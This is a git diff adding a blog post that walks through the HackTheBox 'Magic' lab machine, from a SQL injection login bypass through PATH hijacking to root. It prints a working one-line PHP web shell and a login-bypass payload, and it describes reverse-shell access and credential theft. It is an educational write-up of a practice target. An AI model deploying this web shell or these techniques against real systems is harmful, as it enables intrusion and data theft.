Add old post

_posts/2020-05-17-Magic.md

@@ -0,0 +1,77 @@
+---
+layout: post
+title: "HackTheBox Magic"
+date: 2020-05-17
+description: "Writeup of Magic HackTheBox machine"
+tag: CTF
+---
+
+This time we are going to solve a fairly easy hack the box machine. The vulnerabilities of this machine are quite common and it is good for practicing to draw first blood.
+
+### Information gathering
+
+As always we will start with nmap listing the services running on the machine (we can see that there is only one SSH service and one web server).
+
+![](/images/posts/Magic/img1.png "Nmap scan")
+
+The web application doesn't seem to have many features, without authentication we see only static content. 
+
+![](/images/posts/Magic/img2.png "Web page")
+
+As we have no credentials to enter the application, we will try to bypass the login using SQL injection. We will test with the administrator user along with the payload `';--` that allows us to break the query in case of injection.
+
+![](/images/posts/Magic/img3.png "Page login SQL injection")
+
+Inside the web application we find a functionality to upload the images that we have seen in the unauthenticated part.
+
+![](/images/posts/Magic/img4.png "Upload functionality")
+
+It looks like with this functionality we will be able to upload a web shell. Let's try the following basic PHP web shell inside an image and modify the file extension to make it executable.
+
+```php
+<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die;}?>
+```
+
+![](/images/posts/Magic/img5.png "Upload webshell")
+
+### Gaining foothold
+
+With the web shell successfully uploaded, we will try to open a reverse shell in PHP to make it more comfortable to interact with the machine. We see that the shell opens with web server permissions (**www-data**) in the uploads directory.
+
+![](/images/posts/Magic/img6.png "Open reverse connection")
+
+Once we have access to the machine and in the application directory, we are going to walk around and look for files that may give us some clues. Bingo! In file `/var/www/Magic/db.php5` we find database credentials.
+
+![](/images/posts/Magic/img7.png "Database credentials")
+
+With the credentials we have just found, we can extract the entire database and see if there is more sensitive information that will allow us to move forward.
+
+![](/images/posts/Magic/img8.png "Dump database")
+
+### Privilege escalation
+
+We see that the machine has another user, so we are going to use the credentials we have found in the database to move horizontally.
+
+![](/images/posts/Magic/img9.png "Change user")
+
+To simplify access to the machine, we are going to add our public SSH key to be able to access without using credentials.
+
+![](/images/posts/Magic/img10.png "SSH key")
+
+![](/images/posts/Magic/img11.png "SSH connection")
+
+We have to keep looking for some way to elevate privileges, so this time we will list the configuration and possible vulnerabilities with [*linPEAS*](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS).
+
+![](/images/posts/Magic/img12.png "Upload linPEAS")
+
+The script has found a suspicious file that belongs to **root** and that we, being in the **users** group, can read and execute.
+
+![](/images/posts/Magic/img13.png "linPEAS finding")
+
+Analyzing the file `/bin/sysinfo`, we can see that the binary uses the command *lshw* without specifying the whole path of that executable. This allows us to modify the user's PATH so that the application uses a different executable.
+
+![](/images/posts/Magic/img14.png "Read file and sysinfo")
+
+To perform path hijacking we only have to create a file with the same name containing the command we want to execute (in this case read the root flag), add execution permissions and modify the user's PATH. When we run *sysinfo* again, we see how the *lshw* command has been executed and we find the root flag.
+
+![](/images/posts/Magic/img15.png "Modify path")